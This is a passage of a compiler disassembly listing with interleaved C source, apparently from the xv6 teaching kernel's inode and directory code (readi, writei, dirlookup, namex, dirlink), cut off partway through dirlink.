<readi+0xc3> 801019a6: 8d 76 00 lea 0x0(%esi),%esi 801019a9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi bp = bread(ip->dev, bmap(ip, off/BSIZE)); 801019b0: 8b 5d d8 mov -0x28(%ebp),%ebx 801019b3: 89 f2 mov %esi,%edx 801019b5: c1 ea 09 shr $0x9,%edx 801019b8: 89 d8 mov %ebx,%eax 801019ba: e8 21 f9 ff ff call 801012e0 <bmap> 801019bf: 83 ec 08 sub $0x8,%esp 801019c2: 50 push %eax 801019c3: ff 33 pushl (%ebx) m = min(n - tot, BSIZE - off%BSIZE); 801019c5: bb 00 02 00 00 mov $0x200,%ebx return -1; if(off + n > ip->size) n = ip->size - off; for(tot=0; tot<n; tot+=m, off+=m, dst+=m){ bp = bread(ip->dev, bmap(ip, off/BSIZE)); 801019ca: e8 01 e7 ff ff call 801000d0 <bread> 801019cf: 89 c2 mov %eax,%edx m = min(n - tot, BSIZE - off%BSIZE); 801019d1: 8b 45 e4 mov -0x1c(%ebp),%eax 801019d4: 89 f1 mov %esi,%ecx 801019d6: 81 e1 ff 01 00 00 and $0x1ff,%ecx 801019dc: 83 c4 0c add $0xc,%esp memmove(dst, bp->data + off%BSIZE, m); 801019df: 89 55 dc mov %edx,-0x24(%ebp) if(off + n > ip->size) n = ip->size - off; for(tot=0; tot<n; tot+=m, off+=m, dst+=m){ bp = bread(ip->dev, bmap(ip, off/BSIZE)); m = min(n - tot, BSIZE - off%BSIZE); 801019e2: 29 cb sub %ecx,%ebx 801019e4: 29 f8 sub %edi,%eax 801019e6: 39 c3 cmp %eax,%ebx 801019e8: 0f 47 d8 cmova %eax,%ebx memmove(dst, bp->data + off%BSIZE, m); 801019eb: 8d 44 0a 5c lea 0x5c(%edx,%ecx,1),%eax 801019ef: 53 push %ebx if(off > ip->size || off + n < off) return -1; if(off + n > ip->size) n = ip->size - off; for(tot=0; tot<n; tot+=m, off+=m, dst+=m){ 801019f0: 01 df add %ebx,%edi 801019f2: 01 de add %ebx,%esi bp = bread(ip->dev, bmap(ip, off/BSIZE)); m = min(n - tot, BSIZE - off%BSIZE); memmove(dst, bp->data + off%BSIZE, m); 801019f4: 50 push %eax 801019f5: ff 75 e0 pushl -0x20(%ebp) 801019f8: e8 43 2d 00 00 call 80104740 <memmove> brelse(bp); 801019fd: 8b 55 dc mov -0x24(%ebp),%edx 80101a00: 89 14 24 mov %edx,(%esp) 80101a03: e8 d8 e7 ff ff call 801001e0 <brelse> if(off > ip->size || off + n < off) return -1; if(off + n > ip->size) n = ip->size - off; for(tot=0; tot<n; tot+=m, off+=m, dst+=m){ 80101a08: 01 5d e0 add %ebx,-0x20(%ebp) 80101a0b: 83 c4 10 add $0x10,%esp 80101a0e: 39 7d e4 cmp %edi,-0x1c(%ebp) 80101a11: 77 9d ja 801019b0 <readi+0x60> bp = bread(ip->dev, bmap(ip, off/BSIZE)); m = min(n - tot, BSIZE - off%BSIZE); memmove(dst, bp->data + off%BSIZE, m); brelse(bp); } return n; 80101a13: 8b 45 e4 mov -0x1c(%ebp),%eax } 80101a16: 8d 65 f4 lea -0xc(%ebp),%esp 80101a19: 5b pop %ebx 80101a1a: 5e pop %esi 80101a1b: 5f pop %edi 80101a1c: 5d pop %ebp 80101a1d: c3 ret 80101a1e: 66 90 xchg %ax,%ax { uint tot, m; struct buf *bp; if(ip->type == T_DEV){ if(ip->major < 0 || ip->major >= NDEV || !devsw[ip->major].read) 80101a20: 0f bf 40 52 movswl 0x52(%eax),%eax 80101a24: 66 83 f8 09 cmp $0x9,%ax 80101a28: 77 1e ja 80101a48 <readi+0xf8> 80101a2a: 8b 04 c5 80 09 11 80 mov -0x7feef680(,%eax,8),%eax 80101a31: 85 c0 test %eax,%eax 80101a33: 74 13 je 80101a48 <readi+0xf8> return -1; return devsw[ip->major].read(ip, dst, n); 80101a35: 89 7d 10 mov %edi,0x10(%ebp) m = min(n - tot, BSIZE - off%BSIZE); memmove(dst, bp->data + off%BSIZE, m); brelse(bp); } return n; } 80101a38: 8d 65 f4 lea -0xc(%ebp),%esp 80101a3b: 5b pop %ebx 80101a3c: 5e pop %esi 80101a3d: 5f pop %edi 80101a3e: 5d pop %ebp struct buf *bp; if(ip->type == T_DEV){ if(ip->major < 0 || ip->major >= NDEV || !devsw[ip->major].read) return -1; return devsw[ip->major].read(ip, dst, n); 80101a3f: ff e0 jmp *%eax 80101a41: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi uint tot, m; struct buf *bp; if(ip->type == T_DEV){ if(ip->major < 0 || ip->major >= NDEV || !devsw[ip->major].read) return -1; 80101a48: b8 ff ff ff ff mov $0xffffffff,%eax 80101a4d: eb c7 jmp 80101a16 <readi+0xc6> 80101a4f: 90 nop 80101a50 <writei>: // PAGEBREAK! // Write data to inode. // Caller must hold ip->lock. int writei(struct inode *ip, char *src, uint off, uint n) { 80101a50: 55 push %ebp 80101a51: 89 e5 mov %esp,%ebp 80101a53: 57 push %edi 80101a54: 56 push %esi 80101a55: 53 push %ebx 80101a56: 83 ec 1c sub $0x1c,%esp 80101a59: 8b 45 08 mov 0x8(%ebp),%eax 80101a5c: 8b 75 0c mov 0xc(%ebp),%esi 80101a5f: 8b 7d 14 mov 0x14(%ebp),%edi uint tot, m; struct buf *bp; if(ip->type == T_DEV){ 80101a62: 66 83 78 50 03 cmpw $0x3,0x50(%eax) // PAGEBREAK! // Write data to inode. // Caller must hold ip->lock. int writei(struct inode *ip, char *src, uint off, uint n) { 80101a67: 89 75 dc mov %esi,-0x24(%ebp) 80101a6a: 89 45 d8 mov %eax,-0x28(%ebp) 80101a6d: 8b 75 10 mov 0x10(%ebp),%esi 80101a70: 89 7d e0 mov %edi,-0x20(%ebp) uint tot, m; struct buf *bp; if(ip->type == T_DEV){ 80101a73: 0f 84 b7 00 00 00 je 80101b30 <writei+0xe0> if(ip->major < 0 || ip->major >= NDEV || !devsw[ip->major].write) return -1; return devsw[ip->major].write(ip, src, n); } if(off > ip->size || off + n < off) 80101a79: 8b 45 d8 mov -0x28(%ebp),%eax 80101a7c: 39 70 58 cmp %esi,0x58(%eax) 80101a7f: 0f 82 eb 00 00 00 jb 80101b70 <writei+0x120> 80101a85: 8b 7d e0 mov -0x20(%ebp),%edi 80101a88: 89 f8 mov %edi,%eax 80101a8a: 01 f0 add %esi,%eax return -1; if(off + n > MAXFILE*BSIZE) 80101a8c: 3d 00 18 01 00 cmp $0x11800,%eax 80101a91: 0f 87 d9 00 00 00 ja 80101b70 <writei+0x120> 80101a97: 39 c6 cmp %eax,%esi 80101a99: 0f 87 d1 00 00 00 ja 80101b70 <writei+0x120> return -1; for(tot=0; tot<n; tot+=m, off+=m, src+=m){ 80101a9f: 85 ff test %edi,%edi 80101aa1: c7 45 e4 00 00 00 00 movl $0x0,-0x1c(%ebp) 80101aa8: 74 78 je 80101b22 <writei+0xd2> 80101aaa: 8d b6 00 00 00 00 lea 0x0(%esi),%esi bp = bread(ip->dev, bmap(ip, off/BSIZE)); 80101ab0: 8b 7d d8 mov -0x28(%ebp),%edi 80101ab3: 89 f2 mov %esi,%edx m = min(n - tot, BSIZE - off%BSIZE); 80101ab5: bb 00 02 00 00 mov $0x200,%ebx return -1; if(off + n > MAXFILE*BSIZE) return -1; for(tot=0; tot<n; tot+=m, off+=m, src+=m){ bp = bread(ip->dev, bmap(ip, off/BSIZE)); 80101aba: c1 ea 09 shr $0x9,%edx 80101abd: 89 f8 mov %edi,%eax 80101abf: e8 1c f8 ff ff call 801012e0 <bmap> 80101ac4: 83 ec 08 sub $0x8,%esp 80101ac7: 50 push %eax 80101ac8: ff 37 pushl (%edi) 80101aca: e8 01 e6 ff ff call 801000d0 <bread> 80101acf: 89 c7 mov %eax,%edi m = min(n - tot, BSIZE - off%BSIZE); 80101ad1: 8b 45 e0 mov -0x20(%ebp),%eax 80101ad4: 2b 45 e4 sub -0x1c(%ebp),%eax 80101ad7: 89 f1 mov %esi,%ecx 80101ad9: 83 c4 0c add $0xc,%esp 80101adc: 81 e1 ff 01 00 00 and $0x1ff,%ecx 80101ae2: 29 cb sub %ecx,%ebx 80101ae4: 39 c3 cmp %eax,%ebx 80101ae6: 0f 47 d8 cmova %eax,%ebx memmove(bp->data + off%BSIZE, src, m); 80101ae9: 8d 44 0f 5c lea 0x5c(%edi,%ecx,1),%eax 80101aed: 53 push %ebx 80101aee: ff 75 dc pushl -0x24(%ebp) if(off > ip->size || off + n < off) return -1; if(off + n > MAXFILE*BSIZE) return -1; for(tot=0; tot<n; tot+=m, off+=m, src+=m){ 80101af1: 01 de add %ebx,%esi bp = bread(ip->dev, bmap(ip, off/BSIZE)); m = min(n - tot, BSIZE - off%BSIZE); memmove(bp->data + off%BSIZE, src, m); 80101af3: 50 push %eax 80101af4: e8 47 2c 00 00 call 80104740 <memmove> log_write(bp); 80101af9: 89 3c 24 mov %edi,(%esp) 80101afc: e8 2f 12 00 00 call 80102d30 <log_write> brelse(bp); 80101b01: 89 3c 24 mov %edi,(%esp) 80101b04: e8 d7 e6 ff ff call 801001e0 <brelse> if(off > ip->size || off + n < off) return -1; if(off + n > MAXFILE*BSIZE) return -1; for(tot=0; tot<n; tot+=m, off+=m, src+=m){ 80101b09: 01 5d e4 add %ebx,-0x1c(%ebp) 80101b0c: 01 5d dc add %ebx,-0x24(%ebp) 80101b0f: 83 c4 10 add $0x10,%esp 80101b12: 8b 55 e4 mov -0x1c(%ebp),%edx 80101b15: 39 55 e0 cmp %edx,-0x20(%ebp) 80101b18: 77 96 ja 80101ab0 <writei+0x60> memmove(bp->data + off%BSIZE, src, m); log_write(bp); brelse(bp); } if(n > 0 && off > ip->size){ 80101b1a: 8b 45 d8 mov -0x28(%ebp),%eax 80101b1d: 3b 70 58 cmp 0x58(%eax),%esi 80101b20: 77 36 ja 80101b58 <writei+0x108> ip->size = off; iupdate(ip); } return n; 80101b22: 8b 45 e0 mov -0x20(%ebp),%eax } 80101b25: 8d 65 f4 lea -0xc(%ebp),%esp 80101b28: 5b pop %ebx 80101b29: 5e pop %esi 80101b2a: 5f pop %edi 80101b2b: 5d pop %ebp 80101b2c: c3 ret 80101b2d: 8d 76 00 lea 0x0(%esi),%esi { uint tot, m; struct buf *bp; if(ip->type == T_DEV){ if(ip->major < 0 || ip->major >= NDEV || !devsw[ip->major].write) 80101b30: 0f bf 40 52 movswl 0x52(%eax),%eax 80101b34: 66 83 f8 09 cmp $0x9,%ax 80101b38: 77 36 ja 80101b70 <writei+0x120> 80101b3a: 8b 04 c5 84 09 11 80 mov -0x7feef67c(,%eax,8),%eax 80101b41: 85 c0 test %eax,%eax 80101b43: 74 2b je 80101b70 <writei+0x120> return -1; return devsw[ip->major].write(ip, src, n); 80101b45: 89 7d 10 mov %edi,0x10(%ebp) if(n > 0 && off > ip->size){ ip->size = off; iupdate(ip); } return n; } 80101b48: 8d 65 f4 lea -0xc(%ebp),%esp 80101b4b: 5b pop %ebx 80101b4c: 5e pop %esi 80101b4d: 5f pop %edi 80101b4e: 5d pop %ebp struct buf *bp; if(ip->type == T_DEV){ if(ip->major < 0 || ip->major >= NDEV || !devsw[ip->major].write) return -1; return devsw[ip->major].write(ip, src, n); 80101b4f: ff e0 jmp *%eax 80101b51: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi log_write(bp); brelse(bp); } if(n > 0 && off > ip->size){ ip->size = off; 80101b58: 8b 45 d8 mov -0x28(%ebp),%eax iupdate(ip); 80101b5b: 83 ec 0c sub $0xc,%esp log_write(bp); brelse(bp); } if(n > 0 && off > ip->size){ ip->size = off; 80101b5e: 89 70 58 mov %esi,0x58(%eax) iupdate(ip); 80101b61: 50 push %eax 80101b62: e8 59 fa ff ff call 801015c0 <iupdate> 80101b67: 83 c4 10 add $0x10,%esp 80101b6a: eb b6 jmp 80101b22 <writei+0xd2> 80101b6c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi uint tot, m; struct buf *bp; if(ip->type == T_DEV){ if(ip->major < 0 || ip->major >= NDEV || !devsw[ip->major].write) return -1; 80101b70: b8 ff ff ff ff mov $0xffffffff,%eax 80101b75: eb ae jmp 80101b25 <writei+0xd5> 80101b77: 89 f6 mov %esi,%esi 80101b79: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80101b80 <namecmp>: //PAGEBREAK! // Directories int namecmp(const char *s, const char *t) { 80101b80: 55 push %ebp 80101b81: 89 e5 mov %esp,%ebp 80101b83: 83 ec 0c sub $0xc,%esp return strncmp(s, t, DIRSIZ); 80101b86: 6a 0e push $0xe 80101b88: ff 75 0c pushl 0xc(%ebp) 80101b8b: ff 75 08 pushl 0x8(%ebp) 80101b8e: e8 2d 2c 00 00 call 801047c0 <strncmp> } 80101b93: c9 leave 80101b94: c3 ret 80101b95: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80101b99: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80101ba0 <dirlookup>: // Look for a directory entry in a directory. // If found, set *poff to byte offset of entry. struct inode* dirlookup(struct inode *dp, char *name, uint *poff) { 80101ba0: 55 push %ebp 80101ba1: 89 e5 mov %esp,%ebp 80101ba3: 57 push %edi 80101ba4: 56 push %esi 80101ba5: 53 push %ebx 80101ba6: 83 ec 1c sub $0x1c,%esp 80101ba9: 8b 5d 08 mov 0x8(%ebp),%ebx uint off, inum; struct dirent de; if(dp->type != T_DIR) 80101bac: 66 83 7b 50 01 cmpw $0x1,0x50(%ebx) 80101bb1: 0f 85 80 00 00 00 jne 80101c37 <dirlookup+0x97> panic("dirlookup not DIR"); for(off = 0; off < dp->size; off += sizeof(de)){ 80101bb7: 8b 53 58 mov 0x58(%ebx),%edx 80101bba: 31 ff xor %edi,%edi 80101bbc: 8d 75 d8 lea -0x28(%ebp),%esi 80101bbf: 85 d2 test %edx,%edx 80101bc1: 75 0d jne 80101bd0 <dirlookup+0x30> 80101bc3: eb 5b jmp 80101c20 <dirlookup+0x80> 80101bc5: 8d 76 00 lea 0x0(%esi),%esi 80101bc8: 83 c7 10 add $0x10,%edi 80101bcb: 39 7b 58 cmp %edi,0x58(%ebx) 80101bce: 76 50 jbe 80101c20 <dirlookup+0x80> if(readi(dp, (char*)&de, off, sizeof(de)) != sizeof(de)) 80101bd0: 6a 10 push $0x10 80101bd2: 57 push %edi 80101bd3: 56 push %esi 80101bd4: 53 push %ebx 80101bd5: e8 76 fd ff ff call 80101950 <readi> 80101bda: 83 c4 10 add $0x10,%esp 80101bdd: 83 f8 10 cmp $0x10,%eax 80101be0: 75 48 jne 80101c2a <dirlookup+0x8a> panic("dirlookup read"); if(de.inum == 0) 80101be2: 66 83 7d d8 00 cmpw $0x0,-0x28(%ebp) 80101be7: 74 df je 80101bc8 <dirlookup+0x28> // Directories int namecmp(const char *s, const char *t) { return strncmp(s, t, DIRSIZ); 80101be9: 8d 45 da lea -0x26(%ebp),%eax 80101bec: 83 ec 04 sub $0x4,%esp 80101bef: 6a 0e push $0xe 80101bf1: 50 push %eax 80101bf2: ff 75 0c pushl 0xc(%ebp) 80101bf5: e8 c6 2b 00 00 call 801047c0 <strncmp> for(off = 0; off < dp->size; off += sizeof(de)){ if(readi(dp, (char*)&de, off, sizeof(de)) != sizeof(de)) panic("dirlookup read"); if(de.inum == 0) continue; if(namecmp(name, de.name) == 0){ 80101bfa: 83 c4 10 add $0x10,%esp 80101bfd: 85 c0 test %eax,%eax 80101bff: 75 c7 jne 80101bc8 <dirlookup+0x28> // entry matches path element if(poff) 80101c01: 8b 45 10 mov 0x10(%ebp),%eax 80101c04: 85 c0 test %eax,%eax 80101c06: 74 05 je 80101c0d <dirlookup+0x6d> *poff = off; 80101c08: 8b 45 10 mov 0x10(%ebp),%eax 80101c0b: 89 38 mov %edi,(%eax) inum = de.inum; return iget(dp->dev, inum); 80101c0d: 0f b7 55 d8 movzwl -0x28(%ebp),%edx 80101c11: 8b 03 mov (%ebx),%eax 80101c13: e8 f8 f5 ff ff call 80101210 <iget> } } return 0; } 80101c18: 8d 65 f4 lea -0xc(%ebp),%esp 80101c1b: 5b pop %ebx 80101c1c: 5e pop %esi 80101c1d: 5f pop %edi 80101c1e: 5d pop %ebp 80101c1f: c3 ret 80101c20: 8d 65 f4 lea -0xc(%ebp),%esp inum = de.inum; return iget(dp->dev, inum); } } return 0; 80101c23: 31 c0 xor %eax,%eax } 80101c25: 5b pop %ebx 80101c26: 5e pop %esi 80101c27: 5f pop %edi 80101c28: 5d pop %ebp 80101c29: c3 ret if(dp->type != T_DIR) panic("dirlookup not DIR"); for(off = 0; off < dp->size; off += sizeof(de)){ if(readi(dp, (char*)&de, off, sizeof(de)) != sizeof(de)) panic("dirlookup read"); 80101c2a: 83 ec 0c sub $0xc,%esp 80101c2d: 68 f9 72 10 80 push $0x801072f9 80101c32: e8 39 e7 ff ff call 80100370 <panic> { uint off, inum; struct dirent de; if(dp->type != T_DIR) panic("dirlookup not DIR"); 80101c37: 83 ec 0c sub $0xc,%esp 80101c3a: 68 e7 72 10 80 push $0x801072e7 80101c3f: e8 2c e7 ff ff call 80100370 <panic> 80101c44: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 80101c4a: 8d bf 00 00 00 00 lea 0x0(%edi),%edi 80101c50 <namex>: // If parent != 0, return the inode for the parent and copy the final // path element into name, which must have room for DIRSIZ bytes. // Must be called inside a transaction since it calls iput(). static struct inode* namex(char *path, int nameiparent, char *name) { 80101c50: 55 push %ebp 80101c51: 89 e5 mov %esp,%ebp 80101c53: 57 push %edi 80101c54: 56 push %esi 80101c55: 53 push %ebx 80101c56: 89 cf mov %ecx,%edi 80101c58: 89 c3 mov %eax,%ebx 80101c5a: 83 ec 1c sub $0x1c,%esp struct inode *ip, *next; if(*path == '/') 80101c5d: 80 38 2f cmpb $0x2f,(%eax) // If parent != 0, return the inode for the parent and copy the final // path element into name, which must have room for DIRSIZ bytes. // Must be called inside a transaction since it calls iput(). static struct inode* namex(char *path, int nameiparent, char *name) { 80101c60: 89 55 e0 mov %edx,-0x20(%ebp) struct inode *ip, *next; if(*path == '/') 80101c63: 0f 84 53 01 00 00 je 80101dbc <namex+0x16c> ip = iget(ROOTDEV, ROOTINO); else ip = idup(myproc()->cwd); 80101c69: e8 12 1b 00 00 call 80103780 <myproc> // Increment reference count for ip. // Returns ip to enable ip = idup(ip1) idiom. struct inode* idup(struct inode *ip) { acquire(&icache.lock); 80101c6e: 83 ec 0c sub $0xc,%esp struct inode *ip, *next; if(*path == '/') ip = iget(ROOTDEV, ROOTINO); else ip = idup(myproc()->cwd); 80101c71: 8b 70 68 mov 0x68(%eax),%esi // Increment reference count for ip. // Returns ip to enable ip = idup(ip1) idiom. struct inode* idup(struct inode *ip) { acquire(&icache.lock); 80101c74: 68 00 0a 11 80 push $0x80110a00 80101c79: e8 a2 28 00 00 call 80104520 <acquire> ip->ref++; 80101c7e: 83 46 08 01 addl $0x1,0x8(%esi) release(&icache.lock); 80101c82: c7 04 24 00 0a 11 80 movl $0x80110a00,(%esp) 80101c89: e8 b2 29 00 00 call 80104640 <release> 80101c8e: 83 c4 10 add $0x10,%esp 80101c91: eb 08 jmp 80101c9b <namex+0x4b> 80101c93: 90 nop 80101c94: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi { char *s; int len; while(*path == '/') path++; 80101c98: 83 c3 01 add $0x1,%ebx skipelem(char *path, char *name) { char *s; int len; while(*path == '/') 80101c9b: 0f b6 03 movzbl (%ebx),%eax 80101c9e: 3c 2f cmp $0x2f,%al 80101ca0: 74 f6 je 80101c98 <namex+0x48> path++; if(*path == 0) 80101ca2: 84 c0 test %al,%al 80101ca4: 0f 84 e3 00 00 00 je 80101d8d <namex+0x13d> return 0; s = path; while(*path != '/' && *path != 0) 80101caa: 0f b6 03 movzbl (%ebx),%eax 80101cad: 89 da mov %ebx,%edx 80101caf: 84 c0 test %al,%al 80101cb1: 0f 84 ac 00 00 00 je 80101d63 <namex+0x113> 80101cb7: 3c 2f cmp $0x2f,%al 80101cb9: 75 09 jne 80101cc4 <namex+0x74> 80101cbb: e9 a3 00 00 00 jmp 80101d63 <namex+0x113> 80101cc0: 84 c0 test %al,%al 80101cc2: 74 0a je 80101cce <namex+0x7e> path++; 80101cc4: 83 c2 01 add $0x1,%edx while(*path == '/') path++; if(*path == 0) return 0; s = path; while(*path != '/' && *path != 0) 80101cc7: 0f b6 02 movzbl (%edx),%eax 80101cca: 3c 2f cmp $0x2f,%al 80101ccc: 75 f2 jne 80101cc0 <namex+0x70> 80101cce: 89 d1 mov %edx,%ecx 80101cd0: 29 d9 sub %ebx,%ecx path++; len = path - s; if(len >= DIRSIZ) 80101cd2: 83 f9 0d cmp $0xd,%ecx 80101cd5: 0f 8e 8d 00 00 00 jle 80101d68 <namex+0x118> memmove(name, s, DIRSIZ); 80101cdb: 83 ec 04 sub $0x4,%esp 80101cde: 89 55 e4 mov %edx,-0x1c(%ebp) 80101ce1: 6a 0e push $0xe 80101ce3: 53 push %ebx 80101ce4: 57 push %edi 80101ce5: e8 56 2a 00 00 call 80104740 <memmove> path++; if(*path == 0) return 0; s = path; while(*path != '/' && *path != 0) path++; 80101cea: 8b 55 e4 mov -0x1c(%ebp),%edx len = path - s; if(len >= DIRSIZ) memmove(name, s, DIRSIZ); 80101ced: 83 c4 10 add $0x10,%esp path++; if(*path == 0) return 0; s = path; while(*path != '/' && *path != 0) path++; 80101cf0: 89 d3 mov %edx,%ebx memmove(name, s, DIRSIZ); else { memmove(name, s, len); name[len] = 0; } while(*path == '/') 80101cf2: 80 3a 2f cmpb $0x2f,(%edx) 80101cf5: 75 11 jne 80101d08 <namex+0xb8> 80101cf7: 89 f6 mov %esi,%esi 80101cf9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi path++; 80101d00: 83 c3 01 add $0x1,%ebx memmove(name, s, DIRSIZ); else { memmove(name, s, len); name[len] = 0; } while(*path == '/') 80101d03: 80 3b 2f cmpb $0x2f,(%ebx) 80101d06: 74 f8 je 80101d00 <namex+0xb0> ip = iget(ROOTDEV, ROOTINO); else ip = idup(myproc()->cwd); while((path = skipelem(path, name)) != 0){ ilock(ip); 80101d08: 83 ec 0c sub $0xc,%esp 80101d0b: 56 push %esi 80101d0c: e8 5f f9 ff ff call 80101670 <ilock> if(ip->type != T_DIR){ 80101d11: 83 c4 10 add $0x10,%esp 80101d14: 66 83 7e 50 01 cmpw $0x1,0x50(%esi) 80101d19: 0f 85 7f 00 00 00 jne 80101d9e <namex+0x14e> iunlockput(ip); return 0; } if(nameiparent && *path == '\0'){ 80101d1f: 8b 55 e0 mov -0x20(%ebp),%edx 80101d22: 85 d2 test %edx,%edx 80101d24: 74 09 je 80101d2f <namex+0xdf> 80101d26: 80 3b 00 cmpb $0x0,(%ebx) 80101d29: 0f 84 a3 00 00 00 je 80101dd2 <namex+0x182> // Stop one level early. iunlock(ip); return ip; } if((next = dirlookup(ip, name, 0)) == 0){ 80101d2f: 83 ec 04 sub $0x4,%esp 80101d32: 6a 00 push $0x0 80101d34: 57 push %edi 80101d35: 56 push %esi 80101d36: e8 65 fe ff ff call 80101ba0 <dirlookup> 80101d3b: 83 c4 10 add $0x10,%esp 80101d3e: 85 c0 test %eax,%eax 80101d40: 74 5c je 80101d9e <namex+0x14e> // Common idiom: unlock, then put. void iunlockput(struct inode *ip) { iunlock(ip); 80101d42: 83 ec 0c sub $0xc,%esp 80101d45: 89 45 e4 mov %eax,-0x1c(%ebp) 80101d48: 56 push %esi 80101d49: e8 02 fa ff ff call 80101750 <iunlock> iput(ip); 80101d4e: 89 34 24 mov %esi,(%esp) 80101d51: e8 4a fa ff ff call 801017a0 <iput> 80101d56: 8b 45 e4 mov -0x1c(%ebp),%eax 80101d59: 83 c4 10 add $0x10,%esp 80101d5c: 89 c6 mov %eax,%esi 80101d5e: e9 38 ff ff ff jmp 80101c9b <namex+0x4b> while(*path == '/') path++; if(*path == 0) return 0; s = path; while(*path != '/' && *path != 0) 80101d63: 31 c9 xor %ecx,%ecx 80101d65: 8d 76 00 lea 0x0(%esi),%esi path++; len = path - s; if(len >= DIRSIZ) memmove(name, s, DIRSIZ); else { memmove(name, s, len); 80101d68: 83 ec 04 sub $0x4,%esp 80101d6b: 89 55 dc mov %edx,-0x24(%ebp) 80101d6e: 89 4d e4 mov %ecx,-0x1c(%ebp) 80101d71: 51 push %ecx 80101d72: 53 push %ebx 80101d73: 57 push %edi 80101d74: e8 c7 29 00 00 call 80104740 <memmove> name[len] = 0; 80101d79: 8b 4d e4 mov -0x1c(%ebp),%ecx 80101d7c: 8b 55 dc mov -0x24(%ebp),%edx 80101d7f: 83 c4 10 add $0x10,%esp 80101d82: c6 04 0f 00 movb $0x0,(%edi,%ecx,1) 80101d86: 89 d3 mov %edx,%ebx 80101d88: e9 65 ff ff ff jmp 80101cf2 <namex+0xa2> return 0; } iunlockput(ip); ip = next; } if(nameiparent){ 80101d8d: 8b 45 e0 mov -0x20(%ebp),%eax 80101d90: 85 c0 test %eax,%eax 80101d92: 75 54 jne 80101de8 <namex+0x198> 80101d94: 89 f0 mov %esi,%eax iput(ip); return 0; } return ip; } 80101d96: 8d 65 f4 lea -0xc(%ebp),%esp 80101d99: 5b pop %ebx 80101d9a: 5e pop %esi 80101d9b: 5f pop %edi 80101d9c: 5d pop %ebp 80101d9d: c3 ret // Common idiom: unlock, then put. void iunlockput(struct inode *ip) { iunlock(ip); 80101d9e: 83 ec 0c sub $0xc,%esp 80101da1: 56 push %esi 80101da2: e8 a9 f9 ff ff call 80101750 <iunlock> iput(ip); 80101da7: 89 34 24 mov %esi,(%esp) 80101daa: e8 f1 f9 ff ff call 801017a0 <iput> iunlock(ip); return ip; } if((next = dirlookup(ip, name, 0)) == 0){ iunlockput(ip); return 0; 80101daf: 83 c4 10 add $0x10,%esp if(nameiparent){ iput(ip); return 0; } return ip; } 80101db2: 8d 65 f4 lea -0xc(%ebp),%esp iunlock(ip); return ip; } if((next = dirlookup(ip, name, 0)) == 0){ iunlockput(ip); return 0; 80101db5: 31 c0 xor %eax,%eax if(nameiparent){ iput(ip); return 0; } return ip; } 80101db7: 5b pop %ebx 80101db8: 5e pop %esi 80101db9: 5f pop %edi 80101dba: 5d pop %ebp 80101dbb: c3 ret namex(char *path, int nameiparent, char *name) { struct inode *ip, *next; if(*path == '/') ip = iget(ROOTDEV, ROOTINO); 80101dbc: ba 01 00 00 00 mov $0x1,%edx 80101dc1: b8 01 00 00 00 mov $0x1,%eax 80101dc6: e8 45 f4 ff ff call 80101210 <iget> 80101dcb: 89 c6 mov %eax,%esi 80101dcd: e9 c9 fe ff ff jmp 80101c9b <namex+0x4b> iunlockput(ip); return 0; } if(nameiparent && *path == '\0'){ // Stop one level early. iunlock(ip); 80101dd2: 83 ec 0c sub $0xc,%esp 80101dd5: 56 push %esi 80101dd6: e8 75 f9 ff ff call 80101750 <iunlock> return ip; 80101ddb: 83 c4 10 add $0x10,%esp if(nameiparent){ iput(ip); return 0; } return ip; } 80101dde: 8d 65 f4 lea -0xc(%ebp),%esp return 0; } if(nameiparent && *path == '\0'){ // Stop one level early. iunlock(ip); return ip; 80101de1: 89 f0 mov %esi,%eax if(nameiparent){ iput(ip); return 0; } return ip; } 80101de3: 5b pop %ebx 80101de4: 5e pop %esi 80101de5: 5f pop %edi 80101de6: 5d pop %ebp 80101de7: c3 ret } iunlockput(ip); ip = next; } if(nameiparent){ iput(ip); 80101de8: 83 ec 0c sub $0xc,%esp 80101deb: 56 push %esi 80101dec: e8 af f9 ff ff call 801017a0 <iput> return 0; 80101df1: 83 c4 10 add $0x10,%esp 80101df4: 31 c0 xor %eax,%eax 80101df6: eb 9e jmp 80101d96 <namex+0x146> 80101df8: 90 nop 80101df9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 80101e00 <dirlink>: } // Write a new directory entry (name, inum) into the directory dp. int dirlink(struct inode *dp, char *name, uint inum) { 80101e00: 55 push %ebp 80101e01: 89 e5 mov %esp,%ebp 80101e03: 57 push %edi 80101e04: 56 push %esi 80101e05: 53 push %ebx 80101e06: 83 ec 20 sub $0x20,%esp 80101e09: 8b 5d 08 mov 0x8(%ebp),%ebx int off; struct dirent de; struct inode *ip; // Check that name is not present. if((ip = dirlookup(dp, name, 0)) != 0){ 80101e0c: 6a 00 push $0x0 80101e0e: ff 75 0c pushl 0xc(%ebp) 80101e11: 53 push %ebx 80101e12: e8 89 fd ff ff call 80101ba0 <dirlookup> 80101e17: 83 c4 10 add $0x10,%esp 80101e1a: 85 c0 test %eax,%eax 80101e1c: 75 67 jne 80101e85 <dirlink+0x85> iput(ip); return -1; } // Look for an empty dirent. for(off = 0; off < dp->size; off += sizeof(de)){ 80101e1e: 8b 7b 58 mov 0x58(%ebx),%edi 80101e21: 8d 75 d8 lea -0x28(%ebp),%esi 80101e24: 85 ff test %edi,%edi 80101e26: 74 29 je 80101e51 <dirlink+0x51> 80101e28: 31 ff xor %edi,%edi 80101e2a: 8d 75 d8 lea -0x28(%ebp),%esi 80101e2d: eb 09 jmp 80101e38 <dirlink+0x38> 80101e2f: 90 nop 80101e30: 83 c7 10 add $0x10,%edi 80101e33: 39 7b 58 cmp %edi,0x58(%ebx) 80101e36: 76 19 jbe 80101e51 <dirlink+0x51> if(readi(dp, (char*)&de, off, sizeof(de)) != sizeof(de)) 80101e38: 6a 10 push $0x10 80101e3a: 57 push %edi 80101e3b: 56 push %esi 80101e3c: 53 push %ebx 80101e3d: e8 0e fb ff ff call 80101950 <readi> 80101e42: 83 c4 10 add $0x10,%esp 80101e45: 83 f8 10 cmp $0x10,%eax 80101e48: 75 4e jne 80101e98 